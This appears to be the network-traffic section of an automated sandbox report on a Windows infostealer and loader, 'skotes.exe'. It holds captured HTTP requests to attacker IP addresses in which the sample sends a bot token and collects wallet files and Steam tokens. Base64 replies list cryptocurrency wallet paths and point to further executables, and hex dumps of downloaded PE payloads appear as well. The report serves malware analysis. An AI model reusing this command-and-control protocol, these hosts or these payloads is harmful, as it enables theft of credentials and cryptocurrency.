                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 41 45 43 41 4b 4b 46 43 42 46 49 45 47 43 42 4b 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------GIEBAECAKKFCBFIEGCBKContent-Disposition: form-data; name="message"wallets------GIEBAECAKKFCBFIEGCBK--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:33.742203951 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:33 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                Content-Length: 2408
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=89
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:33.974852085 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IDHCGDAFBKFIDHJJJDHC
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 265
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 43 47 44 41 46 42 4b 46 49 44 48 4a 4a 4a 44 48 43 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------IDHCGDAFBKFIDHJJJDHCContent-Disposition: form-data; name="message"files------IDHCGDAFBKFIDHJJJDHC--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:34.424112082 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:34 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=88
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:34.971575975 CET565OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCF
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="file"------CGHCGIIDGDAKFIEBKFCF--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:36.015618086 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:35 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=87
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:36.185693026 CET474OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ
                                                                                                                                                                                                                                                Host: 185.215.113.206
                                                                                                                                                                                                                                                Content-Length: 272
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 34 61 30 62 63 66 39 34 63 65 32 30 34 62 36 37 37 30 38 31 33 32 36 33 61 63 36 34 66 30 31 38 30 30 38 38 61 31 66 32 66 31 34 33 32 66 31 34 37 37 38 66 62 31 33 35 32 37 62 35 36 33 62 38 64 64 37 30 39 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 2d 2d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"64a0bcf94ce204b6770813263ac64f0180088a1f2f1432f14778fb13527b563b8dd709e0------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="message"ybncbhylepme------DAEBKKKEHDHDGDGCFBKJ--
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:36.634797096 CET271INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:36 GMT
                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                Content-Length: 68
                                                                                                                                                                                                                                                Keep-Alive: timeout=5, max=86
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d
                                                                                                                                                                                                                                                Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                16192.168.2.44991731.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:01.322643042 CET62OUTGET /files/burpin1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582294941 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:02 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 4438776
                                                                                                                                                                                                                                                Last-Modified: Tue, 10 Dec 2024 00:01:52 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675784f0-43baf8"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 00 00 00 a0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 02 00 00 02 00 00 e7 a4 44 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 c9 01 00 c8 00 00 00 00 30 02 00 10 4f 00 00 00 00 00 00 00 00 00 00 10 7b 43 00 e8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 01 00 6c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ`@`!L!Require Windows$PEL?O_@D0O{C?l.text `.rdata;<@@.dataM@.rsrcO0P@@U`AS3;VWtf9bAt`APPPYnj'@uv=A6PP9^]v8^3hAPPPxAEE;FrP~Y6jtAt$DV%sAF8^jqA39`At@9D$tt$Ph5XAA3D$`|$u@3pAt$D$t$`A/@t$PQ%`A3T$L$fAABBfuL$3f9t@f<Aut$TAL$%S\$VC;^tLW3
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582357883 CET1236INData Raw: c9 6a 02 5a 8b c3 f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 94 80 01 00 8b f8 33 c0 39 46 08 59 7e 1d 39 46 04 7e 10 8b 0e 66 8b 0c 41 66 89 0c 47 40 3b 46 04 7c f0 ff 36 e8 68 80 01 00 59 8b 46 04 89 3e 66 83 24 47 00 89 5e 08 5f 5e 5b c2 04 00 56 8b f1
                                                                                                                                                                                                                                                Data Ascii: jZQ39FY~9F~fAfG@;F|6hYF>f$G^_^[Vv\IY^oUQQAuVjjEP5A|At>E;Ew6rE;Es,j*P*YYtlAj@ AEPjh5XAA3D$tlA
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582412958 CET448INData Raw: 3b f3 74 06 8b 06 56 ff 50 08 33 c0 40 eb 25 e8 a7 fe ff ff 8d 4d e0 8b f8 e8 bb 0e 01 00 8b 06 56 ff 50 08 8b c7 eb 0c 3b f3 74 06 8b 06 56 ff 50 08 33 c0 5e 5f 5b c9 c3 56 8b f1 c7 46 04 60 c3 41 00 83 66 08 00 c7 06 34 a5 41 00 c7 46 04 24 a5
                                                                                                                                                                                                                                                Data Ascii: ;tVP3@%MVP;tVP3^_[VF`Af4AF$AfNf$N(^Uh$AuYYtEP#UPQ3hAudYYu@]Vv({F$YtPQvzvYtVP^l$
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582426071 CET1236INData Raw: 56 8b f1 8d 4e 08 c7 06 58 a5 41 00 e8 fa 0a 01 00 f6 44 24 08 01 74 07 56 e8 f1 79 01 00 59 8b c6 5e c2 04 00 55 8b ec 51 56 57 ff 75 08 8b f1 8d 4e 0c e8 26 1e 01 00 ff 75 0c 8d 7e 10 8b cf e8 63 fb ff ff 6a 5c 8b cf e8 ec fe ff ff 33 ff 8d 45
                                                                                                                                                                                                                                                Data Ascii: VNXAD$tVyY^UQVWuN&u~cj\3EPWVh<@WW5dA=lAA=AhAtsj5hAAlA;=XAt2t!ttg~k~}PjKjjjW|YYd9=`Au\EP5hAAMt;u
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582542896 CET1236INData Raw: 48 08 89 78 10 89 78 14 e8 2c 07 01 00 84 c0 0f 85 b0 00 00 00 ff 15 98 a1 41 00 53 8d 4d e4 89 45 08 e8 7b f6 ff ff 8d 45 e4 50 e8 5e 16 00 00 3b c7 59 7d 3b ff 75 08 8b 06 6a 6a 56 ff 50 20 ff 75 e4 8b f0 e8 f1 74 01 00 8b 45 0c 3b c7 59 74 06
                                                                                                                                                                                                                                                Data Ascii: Hxx,ASME{EP^;Y};ujjVP utE;YtPQMutYMf<AuE6YujhVPF jSHxxuAPjjVS uwtYuMVEM0g#E8>AP
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582555056 CET448INData Raw: 6a 18 ff 75 08 ff 15 40 a0 41 00 57 53 ff 75 d8 ff d6 57 53 ff 75 dc 89 45 f4 ff d6 ff 75 fc 8b 35 18 a0 41 00 89 45 f8 ff d6 ff 75 fc 8b d8 ff d6 ff 75 08 8b 35 38 a0 41 00 53 8b f8 ff d6 ff 75 f8 89 45 f0 ff 75 f4 ff 75 fc ff 15 34 a0 41 00 50
                                                                                                                                                                                                                                                Data Ascii: ju@AWSuWSuEu5AEuu58ASuEuu4APWjWE<Ah u3uPPSuuPPW,AjW(AuESuW5$ASWujAEuWAWWWWuTA_^[UhSVWj@EPuA-h
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582566023 CET1236INData Raw: 50 ff 51 0c 39 75 fc 74 3f ff 75 fc e8 d4 fd ff ff 59 8d 4d d8 51 6a 18 50 89 45 fc ff 15 40 a0 41 00 6a 06 ff 75 e0 ff 75 dc 56 56 56 ff 75 08 ff 15 84 a2 41 00 ff 75 fc 56 68 72 01 00 00 ff 75 08 ff 15 b8 a2 41 00 8b 45 f0 8b 08 50 ff 51 08 33
                                                                                                                                                                                                                                                Data Ascii: PQ9ut?uYMQjPE@AjuuVVVuAuVhruAEPQ3@WPA3_^[f=AuD<AfAAfft@Af=uDAA;ufAAUSV339AtAM9tFA9u9
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582577944 CET224INData Raw: 5b c2 04 00 8b 01 8b 51 04 8b 4c 24 08 2b d1 8d 54 12 02 8d 0c 48 52 51 8b 4c 24 0c 8d 04 48 50 ff 15 3c a2 41 00 83 c4 0c c2 08 00 53 56 57 eb 3b 8b 02 8b 39 8a 1c 07 8a c3 e8 db f5 ff ff 84 c0 75 27 80 fb 3b 75 2d 3b fe 7d 12 8b 01 8b 32 80 3c
                                                                                                                                                                                                                                                Data Ascii: [QL$+THRQL$HP<ASVW;9u';u-;}2<0t@;B|2_^[Ar91|S\$VWu33|$Gt$P$AtF;w|3_^[t3GVt$W39~~(Ft$P$A
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582644939 CET1236INData Raw: 00 85 c0 75 0b 8b 06 6a 01 57 8b ce ff 50 04 4f 47 3b 7e 08 7c d8 5f 5e c3 56 8b f1 ff 76 0c e8 cf 68 01 00 ff 36 e8 c8 68 01 00 59 59 5e c3 ff 74 24 0c ff 74 24 0c ff 74 24 0c e8 59 ff ff ff 83 c4 0c 85 c0 74 04 8b 40 0c c3 33 c0 c3 55 8b ec 83
                                                                                                                                                                                                                                                Data Ascii: ujWPOG;~|_^Vvh6hYY^t$t$t$Yt@3U@}u3AE@uEEP At7M3;w.rE;Es$j+pPkYYtAA3@t$Yujht$jAt$jYu%8AV
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.582942009 CET1236INData Raw: ff 75 08 53 ff 75 10 ff 15 18 a1 41 00 8b 0e 88 1c 08 89 46 04 5f 8b c6 5e 5b 5d c3 55 8b ec 83 ec 0c 8d 4d f4 e8 76 e6 ff ff 83 7d fc 01 7f 0a 6a 01 8d 4d f4 e8 32 e3 ff ff 56 8b 35 14 a1 41 00 57 8b 7d 08 8b 07 6a 01 ff 75 f4 50 ff d6 85 c0 75
                                                                                                                                                                                                                                                Data Ascii: uSuAF_^[]UMv}jM2V5AW}juPuucY7S@PPMPSuVf$FYEEPdVcY[_^U cSVW}3SSSSWPEu50AXuEE3]]]}MQ
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:02.702243090 CET1236INData Raw: 15 04 a1 41 00 5e c3 33 c0 5e c3 56 e8 ac fe ff ff 59 5e c3 53 8b 5c 24 0c 8b 03 83 63 04 00 66 83 20 00 56 8b 74 24 0c 57 6a 02 5f eb 08 66 3d 20 00 77 0a 03 f7 0f b7 06 66 85 c0 75 f0 66 83 3e 2c 75 0f eb 0b 66 85 c0 74 4d 66 3d 2c 00 74 47 03
                                                                                                                                                                                                                                                Data Ascii: A^3^VY^S\$cf Vt$Wj_f= wfuf>,uftMf=,tGf={u0{t+uFf8}tF"Ff8{uPfu_^[L$Vj\%L$j/;~^VW|$t$A~!FPPPt$


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                17192.168.2.449944185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:12.669333935 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014796001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:13.996731997 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:13 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                18192.168.2.44994631.41.244.11807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:14.792092085 CET59OUTGET /files/fate/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 31.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.864893913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:53:15 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 727552
                                                                                                                                                                                                                                                Last-Modified: Wed, 11 Dec 2024 08:22:24 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "67594bc0-b1a00"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 c0 24 58 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4e 01 00 00 a8 00 00 00 00 00 00 2c 36 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 0b 00 00 08 00 00 7c 7a 0b 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c ca 01 00 64 00 00 00 00 00 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 02 00 80 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 68 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 34 cc [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL$XgN,6@P|z@ld8h4d.textAMN `.rdata<~`V@@.dataL@.rsrc@@.reloc@B.bss0@.bss@
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.864949942 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:53:15.864967108 CET448INData Raw: 89 c7 83 f8 0f 77 2c 90 89 7d c4 c7 45 c8 0f 00 00 00 57 ff 75 e0 8d 45 b4 50 e8 f4 36 00 00 83 c4 0c 01 ef 83 c7 b4 eb 77 66 2e 0f 1f 84 00 00 00 00 00 90 89 7d d8 83 cf 0f 83 ff 17 b9 16 00 00 00 0f 43 cf 81 ff ff 0f 00 00 c7 45 f0 01 00 00 00
                                                                                                                                                                                                                                                Data Ascii: w,}EWuEP6wf.}CEMrA$PL#FfAP1u}}EEWuVx6E]5MMuEC]ry1tL1fDi[1i
